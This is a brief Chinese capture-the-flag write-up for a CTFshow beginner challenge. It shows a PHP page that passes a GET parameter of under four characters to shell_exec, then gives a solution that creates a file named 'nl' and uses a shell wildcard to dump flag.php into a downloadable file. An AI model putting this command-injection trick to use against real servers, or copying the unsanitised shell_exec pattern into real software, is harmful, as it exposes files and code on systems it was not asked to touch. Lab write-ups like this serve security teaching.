CTFshow-_萌新-获得百分之百的快乐

题目代码

<?php
show_source(__FILE__);
error_reporting(0);
if(strlen($_GET[1])<4){
     echo shell_exec($_GET[1]);
}
else{
     echo "hack!!!";
}
//by Firebasky

要用长度<4的命令来读取flag.php的内容

?1=>nl 在当前目录建一个名为nl的空文件夹

这个时候如果echo *则会回显nl flag.php index.php，所以说*相当于nl flag.php index.php

?1=*>f 等效 nl flag.php index.php>f，将flag.php和index.php的内容写入 f 文件

下载 f 文件即可